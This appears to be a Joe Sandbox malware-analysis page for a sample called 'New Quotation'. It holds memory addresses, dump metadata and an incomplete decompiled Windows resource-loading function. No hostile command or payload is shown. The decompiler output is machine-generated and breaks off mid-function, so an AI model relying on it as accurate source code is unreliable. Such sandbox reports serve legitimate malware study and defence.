                                                                                                                                                                                          0x1d7e81b0
                                                                                                                                                                                          0x1d7e81b0
                                                                                                                                                                                          0x1d7e81b2
                                                                                                                                                                                          0x1d7e81b5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e812d
                                                                                                                                                                                          0x1d7e812d
                                                                                                                                                                                          0x1d7e8130
                                                                                                                                                                                          0x1d7e8132
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e8132
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e812b
                                                                                                                                                                                          0x1d7e8139
                                                                                                                                                                                          0x1d7e813c
                                                                                                                                                                                          0x1d7e8165
                                                                                                                                                                                          0x1d7e8168
                                                                                                                                                                                          0x1d7e816a
                                                                                                                                                                                          0x1d7e8182
                                                                                                                                                                                          0x1d7e8182
                                                                                                                                                                                          0x1d7e816c
                                                                                                                                                                                          0x1d7e8173
                                                                                                                                                                                          0x1d7e8173
                                                                                                                                                                                          0x1d7e813e
                                                                                                                                                                                          0x1d7e813e
                                                                                                                                                                                          0x1d7e8141
                                                                                                                                                                                          0x1d7e8143
                                                                                                                                                                                          0x1d7e815b
                                                                                                                                                                                          0x1d7e8145
                                                                                                                                                                                          0x1d7e8145
                                                                                                                                                                                          0x1d7e8145
                                                                                                                                                                                          0x1d7e8143
                                                                                                                                                                                          0x1d7e8188
                                                                                                                                                                                          0x1d7e818a
                                                                                                                                                                                          0x1d7e8190
                                                                                                                                                                                          0x1d7e8193
                                                                                                                                                                                          0x1d7e8197
                                                                                                                                                                                          0x1d7e8199
                                                                                                                                                                                          0x1d7e8199
                                                                                                                                                                                          0x1d7e8199
                                                                                                                                                                                          0x1d7e819e
                                                                                                                                                                                          0x1d7e8053
                                                                                                                                                                                          0x1d7e8057
                                                                                                                                                                                          0x1d7e805a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e8060
                                                                                                                                                                                          0x1d7e8060
                                                                                                                                                                                          0x1d7e8063
                                                                                                                                                                                          0x1d7e8067
                                                                                                                                                                                          0x1d7e8069
                                                                                                                                                                                          0x1d7e8069
                                                                                                                                                                                          0x1d7e8069
                                                                                                                                                                                          0x1d7e806e
                                                                                                                                                                                          0x1d7e8071
                                                                                                                                                                                          0x1d7e8071
                                                                                                                                                                                          0x1d7e8074
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e8076
                                                                                                                                                                                          0x1d7e8079
                                                                                                                                                                                          0x1d7e807f
                                                                                                                                                                                          0x1d7e8083
                                                                                                                                                                                          0x1d7e8085
                                                                                                                                                                                          0x1d7e8088
                                                                                                                                                                                          0x1d7e808b
                                                                                                                                                                                          0x1d7e80a4
                                                                                                                                                                                          0x1d7e80a6
                                                                                                                                                                                          0x1d7e80b9
                                                                                                                                                                                          0x1d7e80be
                                                                                                                                                                                          0x1d7e80be
                                                                                                                                                                                          0x1d7e80a6
                                                                                                                                                                                          0x1d7e80c7
                                                                                                                                                                                          0x1d7e80c9
                                                                                                                                                                                          0x1d7e80cf
                                                                                                                                                                                          0x1d7e80d1
                                                                                                                                                                                          0x1d7e80dd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e80d3
                                                                                                                                                                                          0x1d7e80d3
                                                                                                                                                                                          0x1d7e80d5
                                                                                                                                                                                          0x1d7e80d5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e80d1
                                                                                                                                                                                          0x1d7e80e1
                                                                                                                                                                                          0x1d7e80e4
                                                                                                                                                                                          0x1d7e80e4
                                                                                                                                                                                          0x1d7e805a
                                                                                                                                                                                          0x1d7e8040
                                                                                                                                                                                          0x1d7e8043
                                                                                                                                                                                          0x1d7e8043
                                                                                                                                                                                          0x1d7e7fd2
                                                                                                                                                                                          0x1d7e7fd2
                                                                                                                                                                                          0x1d7e7fd2
                                                                                                                                                                                          0x1d7e7f6a
                                                                                                                                                                                          0x1d7e7f6a
                                                                                                                                                                                          0x1d7e7f6a
                                                                                                                                                                                          0x1d7e81a1
                                                                                                                                                                                          0x1d7e81a1
                                                                                                                                                                                          0x1d7e81a3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e81a5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e81a5
                                                                                                                                                                                          0x1d7e7f2c
                                                                                                                                                                                          0x1d7e7f32
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e7f32
                                                                                                                                                                                          0x1d7e81c9
                                                                                                                                                                                          0x1d7e81c9
                                                                                                                                                                                          0x1d7e81d0
                                                                                                                                                                                          0x1d7e81d0
                                                                                                                                                                                          0x1d7e81d2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e81d4
                                                                                                                                                                                          0x1d7e81d8
                                                                                                                                                                                          0x1d7e81f3
                                                                                                                                                                                          0x1d7e81da
                                                                                                                                                                                          0x1d7e81da
                                                                                                                                                                                          0x1d7e81dd
                                                                                                                                                                                          0x1d7e81e3
                                                                                                                                                                                          0x1d7e81e6
                                                                                                                                                                                          0x1d7e81e8
                                                                                                                                                                                          0x1d7e81eb
                                                                                                                                                                                          0x1d7e81eb
                                                                                                                                                                                          0x1d7e81e6
                                                                                                                                                                                          0x1d7e81f7
                                                                                                                                                                                          0x1d7e8201
                                                                                                                                                                                          0x1d7e8203
                                                                                                                                                                                          0x1d7e8205
                                                                                                                                                                                          0x1d7e8207
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e8207
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e8203
                                                                                                                                                                                          0x1d7e820f
                                                                                                                                                                                          0x1d7e820f
                                                                                                                                                                                          0x1d7e8212
                                                                                                                                                                                          0x1d7e8215
                                                                                                                                                                                          0x1d7e8217
                                                                                                                                                                                          0x1d7e8219
                                                                                                                                                                                          0x1d7e822d
                                                                                                                                                                                          0x1d7e8232
                                                                                                                                                                                          0x1d7e821b
                                                                                                                                                                                          0x1d7e821b
                                                                                                                                                                                          0x1d7e821d
                                                                                                                                                                                          0x1d7e8220
                                                                                                                                                                                          0x1d7e8222
                                                                                                                                                                                          0x1d7e8222
                                                                                                                                                                                          0x1d7e823a
                                                                                                                                                                                          0x1d7e823d
                                                                                                                                                                                          0x1d7e8243
                                                                                                                                                                                          0x1d7e8246
                                                                                                                                                                                          0x1d7e8248
                                                                                                                                                                                          0x1d7e824e
                                                                                                                                                                                          0x1d7e8251
                                                                                                                                                                                          0x1d7e8254
                                                                                                                                                                                          0x1d7e8254
                                                                                                                                                                                          0x1d7e8257
                                                                                                                                                                                          0x1d7e8259
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e8265
                                                                                                                                                                                          0x1d7e8267
                                                                                                                                                                                          0x1d7e8269
                                                                                                                                                                                          0x1d7e834d
                                                                                                                                                                                          0x1d7e834f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e826f
                                                                                                                                                                                          0x1d7e826f
                                                                                                                                                                                          0x1d7e8272
                                                                                                                                                                                          0x1d7e8272
                                                                                                                                                                                          0x1d7e8278
                                                                                                                                                                                          0x1d7e827a
                                                                                                                                                                                          0x1d7e827d
                                                                                                                                                                                          0x1d7e8280
                                                                                                                                                                                          0x1d7e8284
                                                                                                                                                                                          0x1d7e8287
                                                                                                                                                                                          0x1d7e8289
                                                                                                                                                                                          0x1d7e8289
                                                                                                                                                                                          0x1d7e828b
                                                                                                                                                                                          0x1d7e8291
                                                                                                                                                                                          0x1d7e829d
                                                                                                                                                                                          0x1d7e82a4
                                                                                                                                                                                          0x1d7e82a6
                                                                                                                                                                                          0x1d7e82a9
                                                                                                                                                                                          0x1d7e82ab
                                                                                                                                                                                          0x1d7e82ab
                                                                                                                                                                                          0x1d7e82ab
                                                                                                                                                                                          0x1d7e82ab
                                                                                                                                                                                          0x1d7e82ae
                                                                                                                                                                                          0x1d7e82b1
                                                                                                                                                                                          0x1d7e82b3
                                                                                                                                                                                          0x1d7e8319
                                                                                                                                                                                          0x1d7e831c
                                                                                                                                                                                          0x1d7e8322
                                                                                                                                                                                          0x1d7e82b5
                                                                                                                                                                                          0x1d7e82b5
                                                                                                                                                                                          0x1d7e82b8
                                                                                                                                                                                          0x1d7e82bb
                                                                                                                                                                                          0x1d7e82bd
                                                                                                                                                                                          0x1d7e82c3
                                                                                                                                                                                          0x1d7e82c7
                                                                                                                                                                                          0x1d7e82c9
                                                                                                                                                                                          0x1d7e82cc
                                                                                                                                                                                          0x1d7e82cf
                                                                                                                                                                                          0x1d7e82e8
                                                                                                                                                                                          0x1d7e82ea
                                                                                                                                                                                          0x1d7e82fc
                                                                                                                                                                                          0x1d7e8301
                                                                                                                                                                                          0x1d7e8301
                                                                                                                                                                                          0x1d7e8304
                                                                                                                                                                                          0x1d7e8304
                                                                                                                                                                                          0x1d7e830d
                                                                                                                                                                                          0x1d7e830f
                                                                                                                                                                                          0x1d7e8315
                                                                                                                                                                                          0x1d7e8317
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e8317
                                                                                                                                                                                          0x1d7e8325
                                                                                                                                                                                          0x1d7e8329
                                                                                                                                                                                          0x1d7e8345
                                                                                                                                                                                          0x1d7e8345
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e8329
                                                                                                                                                                                          0x1d7e825b
                                                                                                                                                                                          0x1d7e8261
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e8261
                                                                                                                                                                                          0x1d7e8248
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e7c5c
                                                                                                                                                                                          0x1d7e7c5c
                                                                                                                                                                                          0x1d7e7c5f
                                                                                                                                                                                          0x1d7e7c62
                                                                                                                                                                                          0x1d7e7c65
                                                                                                                                                                                          0x1d7e7c68
                                                                                                                                                                                          0x1d7e7e20
                                                                                                                                                                                          0x1d7e7e24
                                                                                                                                                                                          0x1d7e7c6e
                                                                                                                                                                                          0x1d7e7c6e
                                                                                                                                                                                          0x1d7e7c6e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e7c68
                                                                                                                                                                                          0x1d7e7c56
                                                                                                                                                                                          0x1d7e7bf8
                                                                                                                                                                                          0x1d7e7c06
                                                                                                                                                                                          0x1d7e7c06
                                                                                                                                                                                          0x1d7e74ce
                                                                                                                                                                                          0x1d7e74d2
                                                                                                                                                                                          0x1d7e74d7
                                                                                                                                                                                          0x1d7e74d9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e74db
                                                                                                                                                                                          0x1d7e74e5
                                                                                                                                                                                          0x1d7e7556
                                                                                                                                                                                          0x1d7e7556
                                                                                                                                                                                          0x1d7e7560
                                                                                                                                                                                          0x1d7e756a
                                                                                                                                                                                          0x1d7e7571
                                                                                                                                                                                          0x1d7e7581
                                                                                                                                                                                          0x1d7e7581
                                                                                                                                                                                          0x1d7e74d9
                                                                                                                                                                                          0x1d7e74cc
                                                                                                                                                                                          0x1d7e7386
                                                                                                                                                                                          0x1d7e737e
                                                                                                                                                                                          0x1d7e733d
                                                                                                                                                                                          0x1d7e7333
                                                                                                                                                                                          0x1d7e7167
                                                                                                                                                                                          0x1d7e716d
                                                                                                                                                                                          0x1d7e7174
                                                                                                                                                                                          0x1d7e71d3
                                                                                                                                                                                          0x1d7e71d3
                                                                                                                                                                                          0x1d7e71d3
                                                                                                                                                                                          0x1d7e71d9
                                                                                                                                                                                          0x1d7e71d9
                                                                                                                                                                                          0x1d7e71dd
                                                                                                                                                                                          0x1d7e71e1
                                                                                                                                                                                          0x1d7e71e8
                                                                                                                                                                                          0x1d7e71ea
                                                                                                                                                                                          0x1d7e71ec
                                                                                                                                                                                          0x1d7e71ec
                                                                                                                                                                                          0x1d7e71f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e7176
                                                                                                                                                                                          0x1d7e7176
                                                                                                                                                                                          0x1d7e717c
                                                                                                                                                                                          0x1d7e71b0
                                                                                                                                                                                          0x1d7e71c0
                                                                                                                                                                                          0x1d7e71ca
                                                                                                                                                                                          0x1d7e71cc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e717e
                                                                                                                                                                                          0x1d7e717e
                                                                                                                                                                                          0x1d7e7187
                                                                                                                                                                                          0x1d7e7191
                                                                                                                                                                                          0x1d7e7198
                                                                                                                                                                                          0x1d7e71a8
                                                                                                                                                                                          0x1d7e71a8
                                                                                                                                                                                          0x1d7e717c
                                                                                                                                                                                          0x1d7e7174
                                                                                                                                                                                          0x1d7e8c4a
                                                                                                                                                                                          0x1d7e8c4a
                                                                                                                                                                                          0x1d7e8c51
                                                                                                                                                                                          0x1d7e8c5d
                                                                                                                                                                                          0x1d7e8c97
                                                                                                                                                                                          0x1d7e8c5f
                                                                                                                                                                                          0x1d7e8c68
                                                                                                                                                                                          0x1d7e8c68
                                                                                                                                                                                          0x1d7e8c9f
                                                                                                                                                                                          0x1d7e8ca7
                                                                                                                                                                                          0x1d7e8cac
                                                                                                                                                                                          0x1d7e8cbb
                                                                                                                                                                                          0x1d7e8cbb
                                                                                                                                                                                          0x1d7e8cac
                                                                                                                                                                                          0x1d7e8cc6
                                                                                                                                                                                          0x1d7e8cd4
                                                                                                                                                                                          0x1d7e8cd4
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                          • API String ID: 0-3178619729
                                                                                                                                                                                          • Opcode ID: fcdd743eac1aae757d36c96a48652cbb71e46a292ff6eaff501f4736f5eb317e
                                                                                                                                                                                          • Instruction ID: c8696f5a7048698be76a1b2d32c163a19619f0227ecb24f339c3f0086e36b357
                                                                                                                                                                                          • Opcode Fuzzy Hash: fcdd743eac1aae757d36c96a48652cbb71e46a292ff6eaff501f4736f5eb317e
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC13CF70A00656CFDB15CF68C8807A9FBF1FF89364F1481AAD849AB391D734A945CF92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7DBDE0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E1D7DBDE0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8, signed short _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				void* _v4;
				intOrPtr _v16;
				char _v20;
				char _v736;
				char _v796;
				char _v1504;
				char _v1680;
				char _v2384;
				char _v2640;
				char* _v2644;
				char _v2648;
				int _v2652;
				char _v2653;
				char _v2654;
				void* _v2660;
				short _v2662;
				char _v2664;
				intOrPtr _v2668;
				int _v2672;
				char _v2676;
				int _v2684;
				char _v2688;
				char* _v2692;
				short _v2694;
				char _v2696;
				int _v2700;
				void* _v2704;
				char _v2708;
				intOrPtr* _v2712;
				signed int _v2716;
				signed int _v2720;
				short _v2722;
				char _v2724;
				signed int _v2728;
				int _v2732;
				int _v2736;
				signed int _v2740;
				char _v2744;
				int _v2748;
				int _v2752;
				int _v2756;
				void* _v2760;
				intOrPtr _v2768;
				signed int _v2772;
				int _v2780;
				char _v2784;
				char* _v2788;
				char _v2792;
				char _v2800;
				void _v2828;
				char _v2832;
				char _v2836;
				intOrPtr _t299;
				signed int _t300;
				intOrPtr _t301;
				signed int _t302;
				int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t317;
				signed int _t320;
				signed char* _t323;
				signed int _t324;
				signed char* _t325;
				signed int _t334;
				signed int _t336;
				intOrPtr _t337;
				signed int _t338;
				signed int _t340;
				signed int _t350;
				char* _t356;
				int _t369;
				signed int _t373;
				signed int _t376;
				intOrPtr* _t377;
				signed int _t378;
				signed int _t397;
				signed int _t398;
				signed int _t403;
				signed int _t405;
				signed int _t406;
				char* _t410;
				int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t438;
				signed int _t445;
				intOrPtr _t455;
				signed int _t457;
				intOrPtr _t462;
				signed int _t467;
				intOrPtr _t469;
				signed int _t475;
				intOrPtr* _t485;
				signed int _t486;
				signed int _t489;
				signed int _t490;
				signed int _t492;
				intOrPtr* _t493;
				intOrPtr* _t502;
				signed int _t505;
				short _t515;
				void* _t520;
				void* _t527;
				intOrPtr* _t533;
				signed int _t535;
				signed int _t538;
				intOrPtr* _t543;
				signed int _t545;
				signed int _t547;
				signed int _t550;
				intOrPtr _t551;
				signed int _t553;
				void* _t554;

				_push(0xb04);
				_push(0x1d8abfd0);
				E1D827C40(__ebx, __edi, __esi);
				_v2668 = _a8;
				_v2728 = _a12 & 0x0000ffff;
				_v2712 = _a16;
				_v2740 = _a20;
				_v2708 = 0;
				_v2752 = 0;
				_t543 = 0;
				_v2704 = 0;
				_v2700 = 0;
				_v2736 = 0;
				_v2676 = 0;
				_v2760 = 0;
				_v2654 = 0;
				_v2836 = 0x24;
				_v2832 = 1;
				_t457 = 7;
				memset( &_v2828, 0, _t457 << 2);
				_v2688 = 0;
				_v2756 = 0;
				_v2732 = 0;
				_v2653 = 1;
				_v2748 = 0;
				_v2716 =  &_v2384;
				_v2744 = 0x2be;
				_v2768 = 1;
				_v2684 = 1;
				_t299 = _v2668;
				if(_t299 == 0) {
					L140:
					_t300 = 0xc000000d;
					goto L8;
				} else {
					_t461 = _v2728;
					if(_v2728 == 0) {
						goto L140;
					} else {
						_t533 = _v2712;
						if(_t533 == 0) {
							goto L140;
						} else {
							_t462 = _t299;
							_t301 = E1D7DD530(_t462, _t461,  &_v2676, "true");
							if(_t301 == 0xffffffff) {
								_t535 = _a24 & 0x00400000;
								__eflags = _t535;
								if(_t535 != 0) {
									goto L10;
								} else {
									 *_v2712 = 0;
									_t300 = 0xc00b0006;
									goto L8;
								}
							} else {
								if(_t301 == 0) {
									_t535 = _a24 & 0x00400000;
									__eflags = _t535;
									L10:
									_v2772 = _t535;
									_v2672 = 0;
									__eflags = _t535;
									if(_t535 != 0) {
										_t302 = 0xc0000039;
									} else {
										_t462 = _v2668;
										_t302 = E1D7D8F1E(_t462,  &_v736, _t462,  &_v2752,  &_v2704,  &_v2700,  &_v2748);
										_t543 = _v2704;
									}
									__eflags = _t302;
									if(_t302 < 0) {
										_t462 = _v2668;
										_t545 = E1D85F85C(_t462,  &_v736, 0x2be,  &_v2752,  &_v2732,  &_v2700,  &_v2688);
										_v2652 = _t545;
										__eflags = _t545;
										if(_t545 < 0) {
											goto L39;
										} else {
											_t543 = _v2732;
											_v2704 = _t543;
											goto L13;
										}
									} else {
										L13:
										_t334 = _v2752 & 0xfffffffe;
										__eflags = _t334 - 0x2be;
										if(_t334 >= 0x2be) {
											E1D814C68();
											_push(_t554);
											_push(0);
											_push(_t543);
											_push(_t535);
											_t455 = _t462;
											_t336 = E1D7F0130();
											__eflags = _t336;
											if(_t336 != 0) {
												_t469 =  *0x1d8c9374; // 0x772d0000
												__eflags = _t455 - _t469;
												if(_t455 >= _t469) {
													_t337 =  *0x1d8c9378; // 0x1a3000
													_t336 = _t337 + _t469;
													__eflags = _t455 - _t336;
													if(_t455 >= _t336) {
														goto L103;
													} else {
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														goto L104;
													}
													goto L141;
												} else {
													L103:
													_t336 = E1D7DD700(_t455,  &_v20);
												}
												L104:
												__eflags = _v16 - _t455;
												if(_v16 != _t455) {
													_push(0x18);
													asm("int 0x29");
												}
											}
											return _t336;
										} else {
											 *((short*)(_t554 + _t334 - 0x2e0)) = 0;
											_t338 = E1D81A910(_t543, 0x7e);
											_pop(_t474);
											__eflags = _t338;
											if(_t338 != 0) {
												_t474 =  &_v736;
												_t340 = E1D85F42F( &_v736, _t543,  &_v2756);
												__eflags = _t340;
												if(_t340 >= 0) {
													_t543 = _v2756;
													_v2704 = _t543;
													_t502 = _t543;
													_t527 = _t502 + 2;
													do {
														_t445 =  *_t502;
														_t502 = _t502 + 2;
														__eflags = _t445;
													} while (_t445 != 0);
													_t474 = _t502 - _t527 >> 1;
													_v2700 = (_t502 - _t527 >> 1) + (_t502 - _t527 >> 1);
												}
												goto L15;
												L42:
												__eflags = _t308;
												if(_t308 != 0) {
													_push(_v2676);
													_push(_t545);
													asm("sbb edi, edi");
													_t538 = ( ~_t535 & 0x00000020) + 1;
													__eflags = _t538;
													_push(_t538);
													_push(_v2728);
													_push(0);
													_push( &_v2708);
													E1D7D93A6(0, _v2668,  &_v2672, _t538, _t545, _t538);
												}
												__eflags = _v2672 - 0xffffffff;
												if(_v2672 == 0xffffffff) {
													 *_v2712 = 0;
												} else {
													_t320 = E1D7E3C40();
													__eflags = _t320;
													if(_t320 != 0) {
														_t323 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
													} else {
														_t323 = 0x7ffe0385;
													}
													__eflags =  *_t323 & 0x00000001;
													if(( *_t323 & 0x00000001) != 0) {
														_t324 = E1D7E3C40();
														__eflags = _t324;
														if(_t324 == 0) {
															_t325 = 0x7ffe0384;
														} else {
															_t325 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
														}
														E1D85FC01( &_v2664,  *_t325 & 0x000000ff);
													}
													_v4 = 2;
													 *_v2712 = _v2672;
													_t467 = _v2740;
													__eflags = _t467;
													if(_t467 != 0) {
														 *_t467 = _v2676;
													}
													_t547 = 0;
													_v2652 = 0;
													_v4 = 0xfffffffe;
												}
												__eflags = _v2732;
												if(_v2732 != 0) {
													E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v2732);
												}
												_t311 = _v2756;
												__eflags = _t311;
												if(_t311 != 0) {
													E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t311);
													_t547 = _v2652;
												}
												_t314 = _v2736;
												__eflags = _t314;
												if(_t314 != 0) {
													E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t314);
													_t547 = _v2652;
												}
												_t317 = _v2716;
												__eflags = _t317;
												if(_t317 != 0) {
													__eflags =  &_v2384 - _t317;
													if( &_v2384 != _t317) {
														E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t317);
														_t547 = _v2652;
													}
												}
												_t300 = _t547;
												goto L8;
											}
											L15:
											E1D815050(_t474,  &_v2724, 0);
											E1D815050(_t474,  &_v2696, 0);
											_v2788 =  &_v1504;
											_v2792 = 0x2be0000;
											_v2780 = 0;
											_v2784 = 0;
											_t475 = _v2700;
											_t515 = 0x3c;
											__eflags = _t475 + 0xc - _t515;
											if(_t475 + 0xc > _t515) {
												_t350 = E1D7E5D90(_t475,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xa + _t475 * 2);
												_v2736 = _t350;
												__eflags = _t350;
												if(_t350 == 0) {
													_t545 = 0xc0000017;
													goto L130;
												} else {
													_v2720 = _t350;
													_v2722 = 0xa + _v2700 * 2;
													_t543 = _v2704;
													goto L17;
												}
											} else {
												_v2720 =  &_v796;
												_v2722 = _t515;
												L17:
												_v2724 = 0;
												_t545 = E1D7DFE40(_t475,  &_v2724, _t543);
												_v2652 = _t545;
												__eflags = _t545;
												if(_t545 >= 0) {
													__eflags = _a24 & 0x01000000;
													_t356 = L".mun";
													if((_a24 & 0x01000000) == 0) {
														_t356 = L".mui";
													}
													_t545 = E1D7DFE40(_t475,  &_v2724, _t356);
													_v2652 = _t545;
													__eflags = _t545;
													if(_t545 >= 0) {
														_t359 = _v2748;
														__eflags = _v2748;
														if(__eflags != 0) {
															E1D7EDC40( &_v2836, _t359);
														}
														_v4 = 1;
														_v2652 = _t545;
														_t517 = _v2728;
														_t550 = E1D7D9046(0,  &_v2724, _v2728, _t535, _t545, __eflags,  &_v2792,  &_v2784,  &_v2760);
														_v2652 = _t550;
														_v4 = 0xfffffffe;
														E1D7DC617(_t364);
														__eflags = _t550;
														if(_t550 >= 0) {
															_v2654 = 1;
															_t478 = _v2760;
															_v2660 =  *((intOrPtr*)(_t478 + 4));
															_v2664 =  *_t478;
															_v2662 =  *((intOrPtr*)(_t478 + 2));
														}
														__eflags = _v2654;
														if(_v2654 != 0) {
															_v2692 = 0;
															_t369 = 0;
															_v2684 = 0;
															goto L34;
														} else {
															_v2660 =  &_v1504;
															_v2664 = 0x2be0000;
															_t553 = _a24 & 0x01000000;
															__eflags = _t553;
															if(_t553 != 0) {
																_t493 =  &_v736;
																_t517 = _t493 + 2;
																do {
																	_t405 =  *_t493;
																	_t493 = _t493 + 2;
																	__eflags = _t405;
																} while (_t405 != 0);
																_t406 = _t554 + (_t493 - _t517 >> 1) * 2 - 0x2e4;
																while(1) {
																	__eflags = _t406 -  &_v736;
																	if(_t406 <=  &_v736) {
																		break;
																	}
																	__eflags =  *_t406 - 0x5c;
																	if( *_t406 != 0x5c) {
																		_t406 = _t406 - 2;
																		__eflags = _t406;
																		continue;
																	}
																	break;
																}
																__eflags = _t406 -  &_v736;
																if(_t406 <=  &_v736) {
																	_t545 = 0xc000008a;
																	goto L130;
																} else {
																	_t478 = 0;
																	 *((short*)(_t406 + 2)) = 0;
																	E1D7DFE40(0,  &_v2664,  &_v736);
																	_t410 = L"SystemResources\\";
																	goto L26;
																}
															} else {
																_t410 =  &_v736;
																L26:
																E1D7DFE40(_t478,  &_v2664, _t410);
																__eflags = _t553;
																if(_t553 != 0) {
																	L29:
																	E1D7DFE40(_t478,  &_v2664, _v2720);
																	__eflags = _t553;
																	if(_t553 != 0) {
																		L33:
																		_t369 = _v2684;
																		L34:
																		_t545 = E1D7D91E5(_v2668,  &_v2664, _v2688, _a24, _v2692, _t369,  &_v2708,  &_v2676,  &_v2672);
																		_v2652 = _t545;
																		__eflags = _t545 - 0xc0000034;
																		if(_t545 == 0xc0000034) {
																			L59:
																			_v2644 =  &_v2640;
																			_v2648 = 0x1000000;
																			_v2640 = 0;
																			_t373 = E1D7EC7E7( &_v2648,  &_v2664);
																			__eflags = _t373;
																			if(_t373 >= 0) {
																				E1D7DFCF0( &_v2648,  &_v2648);
																				_t397 =  *[fs:0x18];
																				_t489 =  *(_t397 + 0xfdc);
																				__eflags = _t489;
																				if(_t489 < 0) {
																					_t397 = _t397 + _t489;
																					__eflags = _t397;
																				}
																				__eflags = _t397 -  *((intOrPtr*)(_t397 + 0x18));
																				if(_t397 !=  *((intOrPtr*)(_t397 + 0x18))) {
																					_t551 =  *((intOrPtr*)(_t397 + 0x14c0));
																				} else {
																					_t551 =  *((intOrPtr*)(_t397 + 0xe30));
																				}
																				_t398 =  *[fs:0x18];
																				_t490 =  *(_t398 + 0xfdc);
																				__eflags = _t490;
																				if(_t490 < 0) {
																					_t398 = _t398 + _t490;
																					__eflags = _t398;
																				}
																				__eflags = _t398 -  *((intOrPtr*)(_t398 + 0x18));
																				if(_t398 !=  *((intOrPtr*)(_t398 + 0x18))) {
																					 *((intOrPtr*)(_t398 + 0x14c0)) = 1;
																					 *((intOrPtr*)(_t398 + 0x14c4)) = 0;
																				} else {
																					 *((intOrPtr*)(_t398 + 0xe30)) = 1;
																				}
																				_v2652 = E1D7D91E5(_v2668,  &_v2648, _v2688, _a24, _v2692, _v2684,  &_v2708,  &_v2676,  &_v2672);
																				_t403 =  *[fs:0x18];
																				_t492 =  *(_t403 + 0xfdc);
																				__eflags = _t492;
																				if(_t492 < 0) {
																					_t403 = _t403 + _t492;
																					__eflags = _t403;
																				}
																				__eflags = _t403 -  *((intOrPtr*)(_t403 + 0x18));
																				if(_t403 !=  *((intOrPtr*)(_t403 + 0x18))) {
																					 *((intOrPtr*)(_t403 + 0x14c0)) = _t551;
																					 *((intOrPtr*)(_t403 + 0x14c4)) = 0;
																				} else {
																					 *((intOrPtr*)(_t403 + 0xe30)) = _t551;
																				}
																				_t545 = _v2652;
																			}
																			__eflags =  &_v2640 - _v2644;
																			if( &_v2640 != _v2644) {
																				E1D7CBA80(_v2644);
																			}
																		} else {
																			__eflags = _t545 - 0xc000003a;
																			if(_t545 == 0xc000003a) {
																				goto L59;
																			}
																		}
																		__eflags = _a24 & 0x01000000;
																		if((_a24 & 0x01000000) == 0) {
																			__eflags = _t545 - 0xc000003a;
																			if(_t545 == 0xc000003a) {
																				L81:
																				_t376 = E1D807D8F( &_v736,  &_v1504);
																				__eflags = _t376;
																				if(_t376 != 0) {
																					_t377 =  &_v1504;
																					_v2660 = _t377;
																					_t485 = _t377;
																					_t520 = _t485 + 2;
																					do {
																						_t378 =  *_t485;
																						_t485 = _t485 + 2;
																						__eflags = _t378;
																					} while (_t378 != 0);
																					_t486 = _t485 - _t520;
																					__eflags = _t486;
																					_t487 = _t486 >> 1;
																					_v2664 = (_t486 >> 1) + (_t486 >> 1);
